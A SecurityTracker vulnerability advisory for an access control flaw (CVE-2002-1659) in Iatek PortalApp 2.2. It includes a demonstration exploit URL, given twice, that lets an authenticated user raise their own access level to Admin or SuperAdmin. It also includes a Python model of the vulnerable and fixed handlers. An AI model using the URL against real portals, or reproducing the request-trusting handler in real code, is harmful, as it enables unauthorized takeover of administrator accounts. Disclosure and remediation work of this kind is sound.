SecurityTracker.com
SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   PortalApp
Vendors:   Iatek
Iatek PortalApp Access Control Bug Lets Remote Authenticated Users Gain Administrator Privileges on the Portal
SecurityTracker Alert ID:  1005541
SecurityTracker URL:  http://securitytracker.com/id/1005541
CVE Reference:   CVE-2002-1659
Updated:  Jun 3 2008
Original Entry Date:  Nov 5 2002
Impact:   Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.2
Description:   SilentScripter reported an access control vulnerability in Iatek's PortalApp. A remote authenticated user can obtain elevated privileges on the portal.

The software permits any authenticated user to set their own access level on the portal through the 'user_profile.asp' script: the update action takes the user_id and accesslevel parameters straight from the request, so the caller, not the server-side session, decides which account is modified and what privilege it receives.

A demonstration exploit URL is provided (where the user_id values are 1 for member, 2 for moderator, 3 for Admin, and 4 for SuperAdmin):

http://localhost/aspportal/user_profile.asp?action=update_view_users&accesslevel=[level]&user_id=[your_id]&user_name=[your_name]&f_name=[your_first_name]&l_name=[your_last_name]&dtInserted=[date]&lnk_editprofile=&email=

[Editor's note: The vendor has been notified.]
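The access control pattern behind this advisory, as an added example that is not PortalApp's code: a Python model of the update_view_users handler with the request-trusting version beside a fixed one that takes identity from the session, restricts members to their own profile fields, and lets only an Admin grant an access level to another user (never above the Admin's own). The user table, the handler logic and the editable field list are assumptions; only the parameter names and level numbers come from the advisory.

```python
from urllib.parse import parse_qs, urlsplit

# Access levels as listed in the advisory.
MEMBER, MODERATOR, ADMIN, SUPERADMIN = 1, 2, 3, 4

# Fields a member may change on their own record (assumed).
PROFILE_FIELDS = ("user_name", "f_name", "l_name")


def make_users():
    """Constructed sample user table keyed by user_id (not real PortalApp data)."""
    return {
        1: {"user_name": "root", "f_name": "Site", "l_name": "Owner", "accesslevel": SUPERADMIN},
        7: {"user_name": "alice", "f_name": "Alice", "l_name": "Liddell", "accesslevel": MEMBER},
    }


def parse_request(url):
    """Flatten the query string of a user_profile.asp request into a dict."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in query.items()}


def update_profile_vulnerable(users, session_user_id, params):
    """The advisory's bug: user_id and accesslevel are taken from the request,
    so any authenticated user can rewrite their own (or anyone's) access level."""
    target = users[int(params["user_id"])]
    for key in PROFILE_FIELDS:
        if key in params:
            target[key] = params[key]
    if "accesslevel" in params:
        target["accesslevel"] = int(params["accesslevel"])
    return target["accesslevel"]


def update_profile_fixed(users, session_user_id, params):
    """Identity comes from the server-side session; a member may touch only
    their own profile fields, and accesslevel is granted only by an Admin,
    only to another user, and never above the Admin's own level."""
    actor = users[session_user_id]
    target_id = int(params.get("user_id", session_user_id))
    if target_id != session_user_id and actor["accesslevel"] < ADMIN:
        raise PermissionError("members may edit only their own profile")
    target = users[target_id]
    if "accesslevel" in params:
        wanted = int(params["accesslevel"])
        if actor["accesslevel"] < ADMIN or target_id == session_user_id or wanted > actor["accesslevel"]:
            raise PermissionError("accesslevel may only be granted by an Admin to another user")
        target["accesslevel"] = wanted
    for key in PROFILE_FIELDS:
        if key in params:
            target[key] = params[key]
    return target["accesslevel"]
```

A request whose accesslevel or user_id differs from the session's own values is exactly what the fixed handler rejects, and is worth logging as an escalation attempt.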

Impact:   A remote authenticated user can obtain elevated privileges on the portal.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.aspapp.com/apps/
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


Source Message Contents

Subject:  PortalApp vulnerability



Description : A complete, easy-to-modify .asp portal system. With this
ASPapp portal you can manage users, content, links, forums, surveys,
classifieds, calendar, downloads, images, faq's, news, and more. Complete
asp vbscript source code and Access or SQL database included.
www.aspapp.com/apps/default.asp?section=demos

Exploit :
http://localhost/aspportal/user_profile.asp?action=update_view_users&accesslevel=[level]&user_id=[your_id]&user_name=[your_name]&f_name=[your_first_name]&l_name=[your_last_name]&dtInserted=[date]&lnk_editprofile=&email=
